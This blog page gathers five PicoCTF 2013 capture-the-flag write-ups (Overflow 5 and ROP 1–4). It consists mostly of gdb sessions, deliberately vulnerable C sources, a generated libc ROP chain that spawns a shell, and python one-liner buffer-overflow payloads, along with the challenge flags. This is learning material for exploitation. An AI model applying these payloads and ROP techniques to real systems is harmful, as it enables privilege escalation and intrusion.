Showing posts with label rop. Show all posts
Showing posts with label rop. Show all posts

# PicoCTF 2k13 - Overflow 5 


$ gdb buffer_overflow_shellcode_hard
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483c0 <+0>: push   ebp
   0x080483c1 <+1>: mov    ebp,esp
   0x080483c3 <+3>: and    esp,0xfffffff0
   0x080483c6 <+6>: sub    esp,0x10
   0x080483c9 <+9>: cmp    DWORD PTR [ebp+0x8],0x2
   0x080483cd <+13>: je     0x80483e2 <main+34>
   0x080483cf <+15>: mov    DWORD PTR [esp],0x80485c0
   0x080483d6 <+22>: call   0x8048390 <puts@plt>
   0x080483db <+27>: mov    eax,0x1
   0x080483e0 <+32>: leave  
   0x080483e1 <+33>: ret    
   0x080483e2 <+34>: call   0x8048370 <geteuid@plt>
   0x080483e7 <+39>: mov    DWORD PTR [esp+0x8],eax
   0x080483eb <+43>: mov    DWORD PTR [esp+0x4],eax
   0x080483ef <+47>: mov    DWORD PTR [esp],eax
   0x080483f2 <+50>: call   0x8048360 <setresuid@plt>
   0x080483f7 <+55>: mov    eax,DWORD PTR [ebp+0xc]
   0x080483fa <+58>: mov    eax,DWORD PTR [eax+0x4]
   0x080483fd <+61>: mov    DWORD PTR [esp],eax
   0x08048400 <+64>: call   0x80484c0 <vuln>
   0x08048405 <+69>: xor    eax,eax
   0x08048407 <+71>: leave  
   0x08048408 <+72>: ret    
End of assembler dump.
(gdb) disassemble vuln
Dump of assembler code for function vuln:
   0x080484c0 <+0>: sub    esp,0x41c
   0x080484c6 <+6>: mov    eax,DWORD PTR [esp+0x420]
   0x080484cd <+13>: mov    DWORD PTR [esp+0x4],eax
   0x080484d1 <+17>: lea    eax,[esp+0x10]
   0x080484d5 <+21>: mov    DWORD PTR [esp],eax
   0x080484d8 <+24>: call   0x8048380 <strcpy@plt>
   0x080484dd <+29>: add    esp,0x41c
   0x080484e3 <+35>: ret    
End of assembler dump.
(gdb) break main
(gdb) run
(gdb) info proc mappings 
process 21137
Mapped address spaces:

 Start Addr   End Addr       Size     Offset objfile
  0x8048000  0x8049000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x8049000  0x804a000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x804a000  0x804b000     0x1000     0x1000 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
 0xf7e28000 0xf7e29000     0x1000        0x0 
 0xf7e29000 0xf7fca000   0x1a1000        0x0 /lib32/libc-2.15.so
 0xf7fca000 0xf7fcc000     0x2000   0x1a1000 /lib32/libc-2.15.so
 0xf7fcc000 0xf7fcd000     0x1000   0x1a3000 /lib32/libc-2.15.so
 0xf7fcd000 0xf7fd1000     0x4000        0x0 
 0xf7fda000 0xf7fdb000     0x1000        0x0 
 0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
 0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib32/ld-2.15.so
 0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib32/ld-2.15.so
 0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib32/ld-2.15.so
 0xfffdd000 0xffffe000    0x21000        0x0 [stack]
$ ./ROPgadget /lib32/libc-2.15.so /bin/dash 2>&1 | grep -A 1000 python | sed -e "s/p = ''/p = '\\\x90'*1036/" -e 's/off = 0x0/off = 0xf7e29000/' > ~/rop.py
# cat ~/rop.py 
#!/usr/bin/python
# execve generated by Ropgadget v4.0.4
from struct import pack

p = '\x90'*1036
# Padding goes here

# This ROP Exploit has been generated for a shared object.
# The addresses of the gadgets will need to be adjusted.
# Set this variable to the offset of the shared library
off = 0xf7e29000

p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee0) # @ .data
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "/bin" # /bin
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee4) # @ .data + 4
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "/das" # /das
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee8) # @ .data + 8
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "hAAA" # hAAA
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += "AAAA" # padding
p += pack("<I", off + 0x00032e30) # xor eax,eax ; ret
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000192ee) # pop ebx ; ret
p += pack("<I", off + 0x001a3ee0) # @ .data
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += "AAAA" # padding
p += pack("<I", off + 0x00001a9e) # pop edx ; ret
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += pack("<I", off + 0x00032e30) # xor eax,eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x0002e2f5) # int 0x80
print p
$ ./buffer_overflow_shellcode_hard `python ~/rop.py`
$ cat key
most_impressive_young_padawan
Posted by t0n1 0 comments
Labels: , ,

# PicoCTF 2k13 - ROP 4 


$ cat /problems/ROP_4_887f7f28b1f64d7e/rop4.c
#include <stdio.h>
#include <unistd.h>
#include <string.h>

char exec_string[20];

void exec_the_string() {
 execlp(exec_string, exec_string, NULL);
}

void call_me_with_cafebabe(int cafebabe) {
 if (cafebabe == 0xcafebabe) {
  strcpy(exec_string, "/sh");
 }
}

void call_me_with_two_args(int deadbeef, int cafebabe) {
 if (cafebabe == 0xcafebabe && deadbeef == 0xdeadbeef) {
  strcpy(exec_string, "/bin");
 }
}

void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 512);
}

void be_nice_to_people() {
 // /bin/sh is usually symlinked to bash, which usually drops privs. Make
 // sure we don't drop privs if we exec bash, (ie if we call system()).
 gid_t gid = getegid();
 setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
 exec_string[0] = '\0';
 be_nice_to_people();
 vulnerable_function();
}
$ ln -s /problems/ROP_4_887f7f28b1f64d7e/rop4 rop4
$ ./getenvadrr SHELL ./rop4
SHELL will be at 0xffffd881
$ objdump -t rop4 | grep execlp
08053ab0 g     F .text 0000012a execlp
$ (python -c 'print "\x90"*140 + "\xb0\x3a\x05\x08" + "\x87\xd8\xff\xff"*2 + "\x00"*4'; cat) | ./rop4
cat /problems/ROP_4_887f7f28b1f64d7e/key
fluent_in_roponese
Posted by t0n1 0 comments
Labels: , ,

# PicoCTF 2k13 - ROP 3 


$ cat /problems/ROP_3_7f3312fe43c46d26/rop3.c 
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function()  {
 char buf[128];
 read(STDIN_FILENO, buf,256);
}

void be_nice_to_people() {
 // /bin/sh is usually symlinked to bash, which usually drops privs. Make
 // sure we don't drop privs if we exec bash, (ie if we call system()).
 gid_t gid = getegid();
 setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
 vulnerable_function();
 write(STDOUT_FILENO, "Hello, World\n", 13);
}
$ export | grep SHELL
export SHELL="/bin/sh"
$ ln -s /problems/ROP_3_7f3312fe43c46d26/rop3 rop3
$ ./getenvaddr SHELL ./rop3
SHELL will be at 0xffffd881
$ gdb rop3
(gdb) break main
(gdb) run
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e68250 <system>
(gdb) print exit
$2 = {<text variable, no debug info>} 0xf7e5bf30 <exit>
$ (python -c 'print "\x90"*140 + "\x50\x82\xe6\xf7" + "\x30\xbf\xe5\xf7" + "\x87\xd8\xff\xff"'; cat) | ./rop3
cat /problems/ROP_3_7f3312fe43c46d26/key
rop_rop_rop_all_the_way_home
Posted by t0n1 0 comments
Labels: , ,

# PicoCTF 2k13 - ROP 2 


$ cat rop2.c 
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char * not_used = "/bin/bash";

int not_called() {
 return system("/bin/date");
}

void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
 // /bin/sh is usually symlinked to bash, which usually drops privs. Make
 // sure we don't drop privs if we exec bash, (ie if we call system()).
 gid_t gid = getegid();
 setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
 vulnerable_function();
 write(STDOUT_FILENO, "Hello, World\n", 13);
}
$ objdump -t ./rop2 | grep not_
080484a4 g     F .text 00000014              not_called
0804a024 g     O .data 00000004              not_used
$ gdb ./rop2
(gdb) set disassembly-flavor intel
(gdb) x/7i 0x080484a4
   0x80484a4 : push   ebp
   0x80484a5 : mov    ebp,esp
   0x80484a7 : sub    esp,0x18
   0x80484aa : mov    DWORD PTR [esp],0x804861a
   0x80484b1 : call   0x80483a0 
   0x80484b6 : leave  
   0x80484b7 : ret
(gdb) x/xw 0x0804a024
0x804a024 : 0x08048610
$ (python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
cat key
i_could_get_used_to_this_rop_thing
Posted by t0n1 0 comments
Labels: ,

# PicoCTF 2k13 - ROP 1 


$ cat rop1.c
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int not_called() {
        return system("/bin/bash");
}

void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}
$ (python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
cat key
rops_on_rops_on_rops
Posted by t0n1 0 comments
Labels: ,
Subscribe to: Posts (Atom)